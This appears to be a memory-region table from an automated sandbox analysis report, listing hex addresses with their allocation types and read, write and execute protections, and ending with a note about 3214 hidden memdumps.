559C000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
9550000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
C70000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
9510000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
5525000
trusted library allocation
page read and write
2228A67F000
heap
page read and write
A140000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
DD4000
heap
page read and write
2AD721B0000
trusted library allocation
page read and write
C181000
trusted library allocation
page read and write
1B4F505A000
heap
page read and write
C60000
trusted library allocation
page read and write
4FE1000
trusted library allocation
page read and write
A2F000
stack
page read and write
E9A000
unkown
page readonly
83A5000
trusted library allocation
page read and write
870000
heap
page read and write
2AD722B0000
heap
page read and write
4B0000
heap
page read and write
AF0A000
trusted library allocation
page read and write
1B4F4F20000
heap
page read and write
96E0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
1E185C02000
trusted library allocation
page read and write
BFA6000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
8290000
trusted library allocation
page read and write
6BC0000
direct allocation
page read and write
9135000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
9150000
trusted library allocation
page execute and read and write
9110000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
2BA5A446000
heap
page read and write
9110000
trusted library allocation
page read and write
303E000
stack
page read and write
A140000
trusted library allocation
page read and write
512E000
heap
page read and write
9330000
trusted library allocation
page read and write
4DF2000
trusted library allocation
page read and write
2AD6D559000
heap
page read and write
7541000
heap
page read and write
9460000
trusted library allocation
page read and write
2E3F8800000
heap
page read and write
9230000
unkown
page read and write
9440000
trusted library allocation
page read and write
21D75628000
heap
page read and write
9320000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
55F5000
trusted library allocation
page read and write
FB8B67B000
stack
page read and write
8394000
unkown
page read and write
7390000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
2FB0000
heap
page read and write
4EE0000
trusted library allocation
page read and write
95C4000
unkown
page read and write
83E0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
C1D1000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
94AD000
stack
page read and write
A1E0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
2AD7225E000
heap
page read and write
9450000
trusted library allocation
page read and write
DD4000
heap
page read and write
4DD0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
12E0000
direct allocation
page execute and read and write
4F50000
trusted library allocation
page read and write
8242000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
9302000
trusted library allocation
page read and write
4C86000
trusted library allocation
page read and write
C0E000
stack
page read and write
93B0000
trusted library allocation
page read and write
A1B0000
trusted library allocation
page read and write
A0C3000
trusted library allocation
page read and write
4B60000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
6D840000
unkown
page readonly
AF10000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
94E3000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
93C0000
trusted library allocation
page read and write
2AD6CB02000
heap
page read and write
AEF0000
trusted library allocation
page read and write
2AD72302000
heap
page read and write
4FCB000
heap
page read and write
9330000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
9110000
unkown
page read and write
92E9000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
748C000
direct allocation
page read and write
BCDC000
trusted library allocation
page read and write
94D0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
6D85F000
unkown
page readonly
91E5000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
823F000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
35F0000
heap
page read and write
A160000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
C273000
trusted library allocation
page read and write
A0C42FB000
stack
page read and write
6B60000
direct allocation
page read and write
A100000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
7541000
heap
page read and write
A1D0000
trusted library allocation
page read and write
9110000
unkown
page read and write
628D7B000
stack
page read and write
9225000
trusted library allocation
page read and write
7541000
heap
page read and write
96B0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
7C4000
heap
page read and write
8385000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
56E7000
heap
page read and write
AF00000
trusted library allocation
page read and write
2AD7222E000
heap
page read and write
2BA5A429000
heap
page read and write
AEF0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
EC7E17E000
stack
page read and write
271548D0000
heap
page read and write
27154902000
heap
page read and write
9332000
trusted library allocation
page read and write
2AD72242000
heap
page read and write
C80000
heap
page read and write
A200000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
2AD72101000
trusted library allocation
page read and write
514F000
stack
page read and write
2AD72120000
trusted library allocation
page read and write
820000
heap
page read and write
2AD6D3E0000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
7143000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
AFF0000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
1230000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
2795FE5C000
heap
page read and write
73D0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
27154813000
heap
page read and write
A1D0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
5C20000
direct allocation
page read and write
9126000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
5126000
heap
page read and write
83A0000
trusted library allocation
page read and write
8E0000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
2E3F8829000
heap
page read and write
95B8000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
55D6000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
9160000
unkown
page read and write
21DA902A000
heap
page read and write
92A0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
4AB0000
heap
page read and write
9520000
trusted library allocation
page read and write
7220000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
C1EB000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
A0C0000
trusted library section
page read and write
512E000
heap
page read and write
BC7F000
trusted library allocation
page read and write
9155000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9280000
unkown
page read and write
83A0000
trusted library allocation
page read and write
2AD6D402000
heap
page read and write
83E0000
unkown
page read and write
A1C0000
trusted library allocation
page read and write
7541000
heap
page read and write
9540000
trusted library allocation
page read and write
9460000
trusted library allocation
page execute and read and write
9120000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
7454000
direct allocation
page read and write
C60000
trusted library allocation
page read and write
56BC000
stack
page read and write
748C000
direct allocation
page read and write
A0E0000
trusted library allocation
page read and write
1B4F5802000
trusted library allocation
page read and write
11A1AFF000
stack
page read and write
9210000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
AF80000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
9580000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
7541000
heap
page read and write
B130000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
2228A679000
heap
page read and write
A2F0000
trusted library allocation
page read and write
2FCF000
stack
page read and write
8390000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
D1E29F8000
stack
page read and write
1B4F5065000
heap
page read and write
FD8000
stack
page read and write
92C0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
4F6A000
heap
page read and write
BC49000
trusted library allocation
page read and write
8395000
unkown
page read and write
9260000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
2228A639000
heap
page read and write
DC0000
heap
page read and write
58DA000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
2BA5A3D0000
heap
page read and write
4A00000
heap
page read and write
9110000
trusted library allocation
page read and write
91B000
stack
page read and write
A130000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
4CCF000
trusted library allocation
page read and write
83B0000
unkown
page read and write
9230000
trusted library allocation
page read and write
BA73C7F000
stack
page read and write
92C0000
trusted library allocation
page read and write
A160000
trusted library allocation
page execute and read and write
9330000
trusted library allocation
page read and write
BD5E000
trusted library allocation
page read and write
96E6000
unkown
page read and write
AF10000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
9116000
trusted library allocation
page read and write
8390000
unkown
page read and write
9420000
trusted library allocation
page read and write
9110000
unkown
page read and write
83A0000
trusted library allocation
page read and write
940000
remote allocation
page read and write
1E185260000
heap
page read and write
A100000
trusted library allocation
page read and write
50D1000
heap
page read and write
A170000
trusted library allocation
page read and write
83E0000
unkown
page read and write
70C0000
trusted library allocation
page read and write
1180000
direct allocation
page execute and read and write
9105000
trusted library allocation
page read and write
9280000
unkown
page read and write
8380000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
7541000
heap
page read and write
9110000
unkown
page read and write
542E000
stack
page read and write
A0D4000
trusted library allocation
page read and write
B060000
trusted library allocation
page read and write
9100000
unkown
page read and write
5150000
heap
page read and write
9260000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9420000
unkown
page read and write
6AA0000
direct allocation
page read and write
9747000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
2BA5A455000
heap
page read and write
92F0000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9364000
unkown
page read and write
BCF9000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
2AD6C8E0000
heap
page read and write
95B5000
trusted library allocation
page read and write
AD00000
trusted library allocation
page read and write
A120000
trusted library allocation
page execute and read and write
C60000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
2795FF13000
heap
page read and write
35F4000
heap
page read and write
9150000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
550000
remote allocation
page read and write
4B81000
heap
page read and write
94F0000
unkown
page read and write
92C5000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
9150000
unkown
page read and write
83F5000
trusted library allocation
page read and write
83E5000
unkown
page read and write
9150000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
2F48000
heap
page read and write
91F0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
854000
heap
page read and write
C60000
trusted library allocation
page read and write
A6DE000
stack
page read and write
73E0000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
567D000
heap
page read and write
92A0000
trusted library allocation
page read and write
9325000
trusted library allocation
page read and write
56E7000
heap
page read and write
2FDE000
heap
page read and write
7C0000
heap
page read and write
2BA5A370000
heap
page read and write
8395000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
A0D0000
trusted library allocation
page read and write
924000
heap
page read and write
E1B34FD000
stack
page read and write
9170000
trusted library allocation
page read and write
4ACF000
heap
page read and write
A2F000
stack
page read and write
92A2000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
7540000
heap
page read and write
9450000
trusted library allocation
page read and write
4A3E000
stack
page read and write
37CA000
heap
page read and write
83E6000
trusted library allocation
page read and write
9100000
unkown
page read and write
9110000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
21D75602000
heap
page read and write
DFC000
stack
page read and write
B10000
heap
page read and write
2228A630000
heap
page read and write
2795FE74000
heap
page read and write
83A5000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
2228A66F000
heap
page read and write
9590000
trusted library allocation
page read and write
512000
unkown
page read and write
82E9000
trusted library allocation
page read and write
370000
remote allocation
page read and write
8120000
trusted library allocation
page read and write
9164000
trusted library allocation
page read and write
7541000
heap
page read and write
8390000
unkown
page read and write
9125000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
27960680000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
B070000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
5BE0000
direct allocation
page read and write
4F50000
trusted library allocation
page read and write
F70000
heap
page read and write
21DA9079000
heap
page read and write
AF10000
trusted library allocation
page read and write
56FC000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
1E185250000
heap
page read and write
7740000
trusted library allocation
page read and write
8390000
unkown
page read and write
701D000
stack
page read and write
5552000
trusted library allocation
page read and write
32AF000
stack
page read and write
7770000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
6BB8000
direct allocation
page read and write
AFB0000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
21D75520000
heap
page read and write
9300000
trusted library allocation
page read and write
2AD7229C000
heap
page read and write
8300000
trusted library allocation
page read and write
9458000
trusted library allocation
page read and write
83C5000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
2AD6CA57000
heap
page read and write
83E0000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
21D7563C000
heap
page read and write
8390000
unkown
page read and write
94D5000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
6B20000
direct allocation
page read and write
92A0000
trusted library allocation
page read and write
2228A67D000
heap
page read and write
C60000
trusted library allocation
page read and write
BA73AFF000
stack
page read and write
5390000
direct allocation
page execute and read and write
2AD72221000
heap
page read and write
8390000
unkown
page read and write
C40000
trusted library section
page read and write
3319000
heap
page read and write
1B4F506F000
heap
page read and write
401000
unkown
page execute read
9300000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
717D000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
DD4000
heap
page read and write
9450000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4C73000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
4F00000
trusted library allocation
page read and write
92C0000
unkown
page read and write
9590000
unkown
page read and write
92C0000
trusted library allocation
page read and write
525F000
stack
page read and write
2BFC000
stack
page read and write
5660000
heap
page read and write
1B4F5013000
heap
page read and write
73E6000
trusted library allocation
page read and write
7030000
direct allocation
page read and write
EE0000
trusted library allocation
page read and write
7044000
direct allocation
page read and write
96C0000
trusted library allocation
page read and write
1B4F503D000
heap
page read and write
83C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4FED000
heap
page read and write
ED0000
unkown
page readonly
6D841000
unkown
page execute read
9690000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
4F7F000
heap
page read and write
D40000
heap
page read and write
4C70000
trusted library allocation
page read and write
2228A600000
heap
page read and write
9260000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
FB8B47F000
stack
page read and write
918000
heap
page read and write
AF40000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
9360000
unkown
page read and write
95F0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
59B0000
trusted library allocation
page read and write
2E3F8835000
heap
page read and write
83C0000
trusted library allocation
page read and write
C192000
trusted library allocation
page read and write
96A3000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
9136000
trusted library allocation
page read and write
4DE6000
trusted library allocation
page execute and read and write
1E185502000
heap
page read and write
9520000
unkown
page read and write
AEF0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
60D1000
heap
page read and write
587D000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
5310000
direct allocation
page execute and read and write
8120000
trusted library allocation
page execute and read and write
9420000
unkown
page read and write
95B0000
trusted library allocation
page read and write
96BA000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
568F000
heap
page read and write
9310000
trusted library allocation
page execute and read and write
95C0000
trusted library allocation
page read and write
370000
remote allocation
page read and write
2228A410000
heap
page read and write
9110000
trusted library allocation
page read and write
B1E000
stack
page read and write
7541000
heap
page read and write
83E0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
A130000
trusted library allocation
page read and write
2228A676000
heap
page read and write
96A0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
A300000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
37F5000
heap
page read and write
8390000
trusted library allocation
page read and write
AD20000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
A0E3000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
56E1000
heap
page read and write
AFA0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
8390000
unkown
page read and write
A127000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
56F5000
heap
page read and write
A0F0000
trusted library allocation
page read and write
95E5000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9159000
trusted library allocation
page read and write
2795FF00000
heap
page read and write
9710000
trusted library allocation
page execute and read and write
9100000
trusted library allocation
page read and write
9119000
trusted library allocation
page read and write
4D80000
heap
page read and write
There are 3214 hidden memdumps, click here to show them.